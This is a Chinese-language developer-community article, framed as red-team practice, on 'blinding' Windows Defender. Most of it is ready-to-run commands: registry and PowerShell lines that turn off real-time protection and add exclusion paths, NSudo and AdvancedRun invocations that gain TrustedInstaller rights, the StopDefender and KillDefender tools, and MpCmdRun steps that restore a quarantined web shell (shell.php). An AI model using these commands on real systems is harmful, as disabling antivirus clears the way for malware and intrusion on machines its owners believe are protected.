备案控制台
探索云世界
开发者社区 开发与运维 文章 正文

红蓝对抗之致盲 Windows defender(二)

2023-02-14 316
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 红蓝对抗之致盲 Windows defender

NSudoLG

工具地址:https://github.com/M2Team/NSudo

下载后使用:D:\Documents\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe

免杀测试

使用方法

注意:此工具的 -U:T 参数是获取了 TrustedInstaller 权限

#cmd注册表关闭Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f
#cmd注册表恢复Windows defender
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f
#cmd添加Windows defender排除项
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "c:\temp" /d 0 /t REG_DWORD /f
#NSudoLG.exe关闭Windows defender
NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 1 /f"
#NSudoLG.exe恢复Windows defender
NSudoLG.exe -U:T cmd /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v DisableAntiSpyware /t reg_dword /d 0 /f"
#NSudoLG.exe添加Windows defender排除项
NSudoLG.exe -U:T cmd /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows De

powershell成功上线

AdvancedRun

地址:https://www.nirsoft.net/utils/advanced_run.html

免杀测试

使用方法

AdvancedRun.exe /EXEFilename "%windir%\system32\cmd.exe" /CommandLine '/c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f' /RunAs 8 /Run

powershell成功上线

StopDefender

Github地址:https://github.com/lab52io/StopDefender

免杀测试

使用方法

StopDefender_x64.exe

powershell成功上线

powershell

#查看排除项
Get-MpPreference | select ExclusionPath
#关闭Windows defender
Set-MpPreference -DisableRealTimeMonitoring $true
#增加排除项
Add-MpPreference -ExclusionPath "c:\temp"
#删除排除项
Remove-MpPreference -ExclusionPath "C:\test"

关闭 Windows defender

关闭 实时保护

Set-MpPreference -DisableRealtimeMonitoring $true

其他技巧

MpCmdRun恢复被隔离的文件

MpCmdRun介绍

配置和管理 Microsoft Defender 防病毒软件的命令行工具

详情

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/command-line-arguments-microsoft-defender-antivirus?view=o365-worldwide

寻找MpCmdRun位置

MpCmdRun的位置为:

C:\ProgramData\Microsoft\Windows Defender\Platform\<antimalware platform version>

#查看版本(查看<antimalware platform version>)
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\" /od /ad /b
#验证
dir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.6-0\" | findstr

基础命令

#查看被隔离的文件列表
MpCmdRun -Restore -ListAll
#恢复指定名称的文件至原目录
MpCmdRun -Restore -FilePath C:\phpstudy_pro\WWW\shell.php
#恢复所有文件至原目录
MpCmdRun -Restore -All
#查看指定路径是否位于排除列表中
MpCmdRun -CheckExclusion -path C:\phpstudy_pro\WWW\

移除Token导致Windows Defender失效

Windows Defender进程为MsMpEng.exe,MsMpEng.exe是一个受保护的进程(Protected Process Light,简写为PPL)

非 PPL 进程无法获取 PPL 进程的句柄,导致我们无法直接结束 PPL 进程 MsMpEng.exe, 但是我们能够以 SYSTEM 权限运行的线程修改进程 MsMpEng.exe 的 token, 当我们移除进程 MsMpEng.exe 的所有 token 后,进程 MsMpEng.exe 无法访问其他进程的资源,也就无法检测其他进程是否有害,最终导致 Windows Defender 失效。

本人没有利用成功过

工具地址

https://github.com/pwn1sher/KillDefender

https://github.com/Octoberfest7/KillDefender

https://github.com/Octoberfest7/KDStab

参考文章

https://mp.weixin.qq.com/s/27rvHpsnldnxpJaxwQrLGw

https://zhuanlan.zhihu.com/p/538571344

https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80-Windows-Defender

https://cloud.tencent.com/developer/article/1870239

文章标签:
Windows
安全
关键词:
Windows Defender
亿人安全
目录
相关文章
亚丁号
|
3月前
|
安全 Windows
windows11 永久关闭windows defender的方法
windows11 永久关闭windows defender的方法
亚丁号
305 2
黑色的小鱼
|
数据采集 安全 Windows
解决关于Windows Defender Antivirus Service自启造成运行python程序时,Windows的cpu和内存占用过高问题
启用“关闭Windwos defender”服务解决阿里云Windows服务器的卡顿问题,并列举了网上一些错误的解决方法。
黑色的小鱼
9955 2
解决关于Windows Defender Antivirus Service自启造成运行python程序时,Windows的cpu和内存占用过高问题
乌鸦安全
|
11月前
|
缓存 安全 区块链
艰难的mimikatz源码编译免杀 Windows Defender(下)
艰难的mimikatz源码编译免杀 Windows Defender
乌鸦安全
396 0
乌鸦安全
|
11月前
|
安全 数据安全/隐私保护 C++
老树开新花之shellcode_launcher免杀Windows Defender(上)
老树开新花之shellcode_launcher免杀Windows Defender
乌鸦安全
534 0
乌鸦安全
|
11月前
|
安全 测试技术 Go
新版掩日——免杀Windows Defender
新版掩日——免杀Windows Defender
乌鸦安全
579 0
德迅云安全陈琦琦
|
12月前
|
Windows
如何卸载,禁用和删除Windows Defender
如何卸载,禁用和删除Windows Defender
德迅云安全陈琦琦
557 0
亿人安全
|
机器学习/深度学习 安全 PHP
红蓝对抗之致盲 Windows defender(一)
红蓝对抗之致盲 Windows defender
亿人安全
281 0
柳鲲鹏
|
安全 Windows
WIN10关闭Windows Defender
WIN10关闭Windows Defender
柳鲲鹏
153 0
WIN10关闭Windows Defender
DreamLife
|
安全 Windows
使用注册表关闭Windows 10 Defender
使用注册表关闭Windows 10 Defender
DreamLife
601 0
使用注册表关闭Windows 10 Defender
avatus
|
云安全 Windows
windows10:检测windows defender是不是已经连接到了云安全中心
windows10:检测windows defender是不是已经连接到了云安全中心
avatus
1614 0

热门文章

最新文章

  • 1
    Windows窗口程序
  • 2
    Linux&Windows 日志分析 陇剑杯 CTF
  • 3
    Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
  • 4
    .NET开源免费、功能强大的 Windows 截图录屏神器
  • 5
    【C++/Python】Windows用Swig实现C++调用Python(史上最简单详细,80岁看了都会操作)
  • 6
    Windows12安装Docker
  • 7
    安装MyEclipse遇到错误提示 Failed to find a Main Class in “C:Windows\Temp\“时的解决方案
  • 8
    Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
  • 9
    Windows线程
  • 10
    .NET开源免费的Windows快速文件搜索和应用程序启动器
  • 1
    Windows11搭建Python环境(Anaconda安装与使用)
    9
  • 2
    windows安装MySQL5.7教程
    8
  • 3
    AI电销机器人系统源码部署:freeswitch安装Windows
    8
  • 4
    Windows11轻松设置v1.09
    5
  • 5
    Windows如何远程连接服务器?服务器远程连接图文教程
    19
  • 6
    Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
    28
  • 7
    如何在Windows部署TortoiseSVN客户端并实现公网连接内网VisualSVN服务端
    20
  • 8
    Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
    22
  • 9
    Windows12安装Docker
    30
  • 10
    Windows Docker Desktop 无法启动 自动退出报错信息为:Docker Desktop -Unexpected WsL error An unexpected error was e
    22

    • 相关电子书

    更多
  • 《云服务器运维之Windows篇》
  • TAKING WINDOWS 10 KERNEL
  • ECS运维指南之Windows系统诊断

    • 相关实验场景

    更多
  • 快速配置Windows云服务器
  • 手动搭建FTP站点(Windows)
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)